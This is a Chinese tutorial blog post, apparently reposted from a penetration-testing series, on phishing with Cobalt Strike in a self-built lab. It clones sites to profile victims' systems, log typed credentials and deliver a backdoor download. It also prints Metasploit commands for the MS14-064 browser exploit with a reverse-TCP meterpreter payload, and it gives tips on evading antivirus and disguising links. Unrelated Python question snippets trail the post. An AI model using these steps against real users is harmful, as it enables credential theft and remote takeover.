程序员经验分享-hwhale

渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)

2023-10-30

**

渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)

**

作者:大余
时间:2020-12-17

简介:

渗透测试-地基篇:
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意:

对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!

网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。

网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。

这篇主要演示如何克隆和利用漏洞等方式进行钓鱼,并控制对方!!

二、环境介绍

在这里插入图片描述
黑客(攻击者):
IP:192.168.1.9
系统:kali.2020.4

VPS服务器:
目前演示是用kali来架设做VPS公网服务器的!道理意义一样!

办公电脑:
系统:windwos7和windwos xp

目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门页面钓鱼,通过各种方式办公电脑收到对方邮件或者各种手段发送的钓鱼链接,最终黑客控制办公电脑的过程!!

三、钓鱼演示

下面会演示到所有CS自带模块中的钓鱼攻击演示!!

1、智能收集

在这里插入图片描述
打开System Profiler-分析器功能…

在这里插入图片描述
选择克隆www.baidu.com页面做钓鱼…

在这里插入图片描述
攻击对象访问:http://192.168.1.9/baidu

在这里插入图片描述
当通过各种形式…将192.168.1.9/baidu链接发送给对方,让对方点击后…跳转到了baidu页面…

在这里插入图片描述
可看到选择应用信息后,钓到了客户用的系统以及浏览器版本型号…这里别小看两个信息,思路是该模块可以修改,利用溢出代码等形式提权或者获得更多的信息收集…下面我会写一些演示!!

2、克隆模块和克隆网站进行键盘记录攻击

在这里插入图片描述
打开Web Drive-by–Clone Site克隆网站模块…
在这里插入图片描述
这里克隆网站可以是http和https的URL…克隆到192.168.2.153:801链接上!!
勾选Log Keystrokes on cloned site后,记录键盘操作!
在这里插入图片描述
打开Web Log,功能查看被攻击方登录页面的操作情况!
在这里插入图片描述
可看到访问192.168.2.153:801页面输入了用户名密码…
在这里插入图片描述
可看到记录了对方输入键盘的信息!!

3、克隆网站下载执行木马

在这里插入图片描述
打开Host File 克隆一个页面并提供一个后门文件…
在这里插入图片描述
file:选择CS生成的shell,或者MSF也行!
确定URL下载的地址端口链接等情况!

在这里插入图片描述
生成http://192.168.2.153:801/upload.exe恶意链接…

在这里插入图片描述
然后回到方法2中!!
在打开Clone Site联动克隆模块,将克隆baidu页面,Attack攻击选择恶意链接页面进行钓鱼!
意思就是对方访问http://192.168.2.153:801/dayu页面后会直接下载attack恶意链接后门文件,页面正常跳转到百度页面!

在这里插入图片描述
可看到google访问该页面下载了upload.exe生成的CS后门文件…
这里google带有web安全下载防御功能,IE高版本也会有提示,这种思路是两个模块配合完成的,其中可以修改图标、文件名、弄个免杀、换个欺骗链接,很好钓鱼!

4、Metasploit溢出代码与Cobalt Strik配合钓鱼

本次演示的是思路,拿的是一个针对XP或者以下系统,利用MS14_064利用IE执行远控木马…记住是思路!!
在这里插入图片描述

use exploit/windows/browser/ms14_064_ole_code_execution
set srvhost 192.168.2.153
set SRVPORT 6666
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.153
exploit

这里很简答,MSF执行即可~
http://192.168.2.153:6666/Sixcra获得恶意链接!

在这里插入图片描述
很简单,利用和方法3一样,打开克隆网站模块,放入Attack即可!!
这里就不勾选键盘记录了,因为直接能控制对方了!

在这里插入图片描述
生成URL:http://192.168.2.153:80/baidu

在这里插入图片描述
可看到当对方访问做好的http://192.168.2.153:80/baidu钓鱼页面后,直接跳转到了百度…
但是通过溢出漏洞在攻击端获得了对方的控制shell…

在这里插入图片描述
通过控制,继续横向渗透即可!!

四、总结

这里有四种方法,总结下思路,就是各种模块之间的配合进行简单的钓鱼,知道这些思路后,还可以和别的钓鱼工具配合,或者是别的方法融合!

这里提醒下,如果在克隆模块克隆的是HTTPS的页面,需要在攻击方加载SSL哦,不然没法记录或者执行!!

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

要是你觉得这篇博客写的还不错,欢迎分享给身边的人,欢迎加入免费群共同学习成长。

在这里插入图片描述

如失效加个人以下图,个人微信拉入群。

在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

红队地基必会

安全

信息安全

python

Linux

渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五) 的相关文章

  • 替换字符串列表中的 \x00 的最佳方法?

    我有一个来自已解析 PE 文件的值列表 其中包括 x00每个部分末尾的空字节 我希望能够删除 x00字符串中的字节而不删除所有字节 x 文件中的 s 我试过做 replace and re sub 但并没有取得太大成功 使用Python 2

  • 获取单个方程的脚本

    在文本文件中输入 a 2 8 b 3 9 c 4 8 d 5 9 e a b f c d g 0 6 h 1 7 i e g j f h output i j 期望的输出 输出 2 8 3 9 0 6 4 8 5 9 1 7 如果输入文件名

  • 类属性在功能上依赖于其他类属性

    我正在尝试使用静态类属性来定义另一个静态类属性 我认为可以通过以下代码来实现 f lambda s s 1 class A foo foo bar f A foo 然而 这导致NameError name A is not defined

  • python中函数变量的作用域

    假设我们有两个函数 def ftpConnect ftp FTP server ftp login ftp cwd path def getFileList ftpConnect files ftp nlst print files 如果我

  • VSCode pytest 测试发现失败

    Pytest 测试发现失败 用户界面指出 Test discovery error please check the configuration settings for the tests 输出窗口显示 Test Discovery fa

  • 唯一的图像哈希值即使 EXIF 信息更新也不会改变

    我正在寻找一种方法来为 python 和 php 中的图像创建唯一的哈希值 我考虑过对原始文件使用 md5 和 因为它们可以快速生成 但是当我更新 EXIF 信息 有时时区关闭 时 它会更改总和 并且哈希也会更改 有没有其他方法可以为这些文

  • 如何为多组精灵创建随机位置?

    我尝试使用 blit 和 draw 方法进行 for 循环 并为 PlayerSprite 和 Treegroup 使用不同的变量 for PlayerSprite in Treegroup surface blit PlayerSprit

  • 使用Python将图像转换为十六进制格式

    我的下面有一个jpg文件tmp folder upload path tmp resized test jpg 我一直在使用下面的代码 Method 1 with open upload path rb as image file enco

  • Python While 循环,and (&) 运算符不起作用

    我正在努力寻找最大公因数 我写了一个糟糕的 运算密集型 算法 它将较低的值减一 使用 检查它是否均匀地划分了分子和分母 如果是 则退出程序 但是 我的 while 循环没有使用 and 运算符 因此一旦分子可整除 它就会停止 即使它不是正确

  • 在 Windows 上使用 IPython 笔记本时出现 500 服务器错误

    我刚刚在 Windows 7 Professional 64 位上全新安装了 IPython 笔记本 我采取的步骤是 从以下位置安装 Python 3 4 1http python org http python org gt pip in

  • urllib2.urlopen() 是否实际获取页面?

    当我使用 urllib2 urlopen 时 我在考虑它只是为了读取标题还是实际上带回整个网页 IE 是否真的通过 urlopen 调用或 read 调用获取 HTML 页面 handle urllib2 urlopen url html

  • FastText - 由于 C++ 扩展未能分配内存,无法加载 model.bin

    我正在尝试使用 FastText Python APIhttps pypi python org pypi fasttext https pypi python org pypi fasttext虽然 据我所知 此 API 无法加载较新的

  • Linux mremap 不释放旧映射?

    我需要一种方法将页面从一个虚拟地址范围复制到另一个虚拟地址范围 而无需实际复制数据 范围很大 延迟很重要 mremap 可以做到这一点 但问题是它也会删除旧的映射 由于我需要在多线程环境中执行此操作 因此我需要旧映射能够同时使用 因此稍后当

  • Python 矩阵每一行的总和

    lista 1 2 3 4 5 6 7 8 9 print lista def filas lista res for elemento in lista x sum lista elemento res append x print re

  • SVN 不断提示我输入密码并拒绝缓存我的凭据

    环境 Eclipse Indigo Ubuntu 11 04 Subclipse 1 6 SVN 客户端 Subclipse RabbitVCS 我通过 svn ssh 连接 我的网址如下所示 svn ssh 我的名字 我的域名 路径 我可

  • Python模块单元测试的最佳文件结构组织?

    遗憾的是 我发现有太多方法可以在 Python 中保存单元测试 而且它们通常没有很好的文档记录 我正在寻找一种 终极 结构 它可以满足以下大部分要求 be discoverable by test frameworks including

  • 是否可以强制浮点数的指数或有效数匹配另一个浮点数(Python)?

    这是我前几天试图解决的一个有趣的问题 是否可以强制一个的有效数或指数float与另一个人一样float在Python中 出现这个问题是因为我试图重新调整一些数据 以便最小值和最大值与另一个数据集匹配 然而 我重新调整后的数据略有偏差 大约小

  • Scrapy 蜘蛛无法工作

    由于到目前为止没有任何效果 我开始了一个新项目 python scrapy ctl py startproject Nu 我完全按照教程操作 创建了文件夹和一个新的蜘蛛 from scrapy contrib spiders import

  • CSV 在列中查找最大值并附加新数据

    大约两个小时前 我问了一个关于从网站读取和写入数据的问题 从那时起 我花了最后两个小时试图找到一种方法来从输出的 A 列读取最大日期值 将该值与刷新的网站数据进行比较 并将任何新数据附加到 csv 文件而不覆盖旧的或创建重复项 目前 100

  • PyQt 中的线程和信号问题

    我在 PyQt 中的线程之间进行通信时遇到一些问题 我使用信号在两个线程 发送者和监听者 之间进行通信 发送者发送消息 期望被监听者接收 但是 没有收到任何消息 谁能建议可能出了什么问题 我确信这一定很简单 但我已经环顾了几个小时但没有发现

随机推荐

  • tomcat为什么把那个文件取名为catalina

    内部寓意就是tomcat的脚本文件 寄寓 是个小岛的名字 开发者曾在岛上生活过 Tomcat的这个单词的意思是 公猫 因为它的开发者姆斯 邓肯 戴维森希望用一种能够自己照顾自己的动物代表这个软件 于是命名为tomcat 它的Logo兼吉祥物

  • 分布式环境下的数据一致性

    1 互联网技术的四大法宝 多线程 分布式 异步 缓存 2 事务 编程式事务 3乐观锁 悲观锁 基于状态机的乐观锁

  • Android中引用sweet-alert-dialog以及遇到的问题解决

    概述 sweet alert dialog是一个带动画效果的自定义对话框样式 可以让你的Android程序的对话框优美很多 GitHub地址 Android Studio中引用 repositories mavenCentral depen

  • 【解决vscode终端输出中文乱码问题图文教程】

    全网最全解决vscode运行C C 终端输出乱码问题图文教程 解决vscode终端输出中文乱码问题 强推 方法二 少走几年弯路 乱码原因 方法一 永久性 方法二 永久性 强力推荐 附加 CMD修改成旧控制台 方法三 临时性 如果之前尝试了其

  • kafka入门,发送原理和生产者重要参数(三)

    发送原理 在消息发送过程中 涉及两个线程 main线程和Sender线程 在main线程中创建了一个双端队列 RecordAccumulator Sender过程不断从RecordAccumulator中拉取消息发送到Kafka Broke

  • Maven本地仓库安装jar包

    开发过程中的jar包依赖 通常是通过中央仓库 阿里云仓库等地方直接下载的 但是有一些jar包是不太容易下载 或者说对应的仓库中没有对应的jar包 比如ojdbc6 11 2 0 1 0 jar这个jar包 maven中央仓库中就没有这个版本

  • 基于 WEB 的室内温湿度监测系统(树莓派)

    一 项目介绍 本实验通过 DHT11 模块测量大气中温湿度 利用树莓派多功能的用途 将温湿度测量结果显示到网页 并包含历史数据 实时折线图表示 二 实验介绍 1 实验原材料 树莓派 Raspberry 4 Model B DHT11 v1

  • 计算机添加启动程序,电脑的开机启动项怎么设置?

    每次电脑开机都一堆软件争先恐后的在自动启动 很影响我们的正常使用 电脑开机时间也越来越长 这时灵活的设置我们的开机启动项就很有必要了 能帮助我们更高效的使用电脑 那么 我们该怎么设置这些开机自启的软件呢 方法一 手动设置 1 添加电脑的开机

  • 【MongoDB】基于Docker的MongoDB replica set(副本集)更换节点

    之前搭的副本集 1主 1从 1投票 今天要进行把投票节点切换服务器 首先 在新服务器上启动mongodb服务 然后 在主节点上对集群配置进行更新 rs0 PRIMARY gt cfg rs conf rs0 PRIMARY gt cfg m

  • yolov5训练结果解析

    在每次训练之后 都会在runs train文件夹下出现一下文件 如下图 一 weights 包含best pt 做detect时用这个 和last pt 最后一次训练模型 二 confusion 1 混淆矩阵 混淆矩阵是对分类问题的预测结果

  • 【无标题】数组转化成tree

    在这里插入图片描述 父数组 father G1 G2 G3 G4 G5 子数组 son 1 2 3 4 5 数组转化成tree

  • java实现金额数字转换为中文大写

    import java io import java lang IllegalArgumentException public class ConvertNum 把金额阿拉伯数字转换为汉字表示 小数点后四舍五入保留两位 还有一种方法可以在转

  • 浅拷贝与深拷贝例题与思考

    title 浅拷贝与深拷贝 author hou wei date 2023 04 17 output html document knitr opts chunk set echo TRUE 问答题 0 请问你是如何理解 在 Python

  • sqlserver 批量快速插入数据

    先转换成DataTable 然后插入数据 1 使用最后再看看使用表值参数的效率 效率最高 首先先创建 表值特性类型的表 此表应该与转换后的datatable的列相同不然会出错 查看地方在 当前数据库下的 可编程性 类型 用户定义表类型 CR

  • 【分享】ST7920的LCD12864 Proteus仿真模型

    分享 ST7920的LCD12864 Proteus仿真模型 目前最新版本的是1 03 GitHub地址 https github com cdhigh lcd12864 st7920 proteus Proteus添加动态链接库文件 dl

  • 网站部署详细流程(包括域名,服务器的配置等)

    有很多做网页的前端后端小白都想把自己辛辛苦苦做出来的网站放到网上 让别人观摩观摩 可无奈技术有限 对于网站部署流程有些迷茫 在这里 我会告诉大家 如何将自己做出来的网站放到网上 首先 我们需要明白几个概念 备案 解析 然后 我们还要知道 应

  • 上传formData文件

    if config method get config file const data config data const formData new FormData Object keys data forEach key gt if A

  • QT的tableWidget数据存储到Excle

    目录 环境介绍 所需要的头文件 测试效果 TableWidget表格的内容 Excel表格内容 lt

  • Grub2启动项启动顺序修改

    关键点即 修改grub cfg 终端命令 sudo i 获取权限 chmod w boot grub grub cfg 给文件添加写入权限 gedit boot grub grub cfg 编辑文件内容 BEGIN etc grub d 3

  • 渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)

    渗透测试 地基钓鱼篇 Cobalt Strike钓鱼 二十五 作者 大余 时间 2020 12 17 简介 渗透测试 地基篇 该篇章目的是重新牢固地基 加强每日训练操作的笔记 在记录地基笔记中会有很多跳跃性思维的操作和方式方法 望大家能共同

热门标签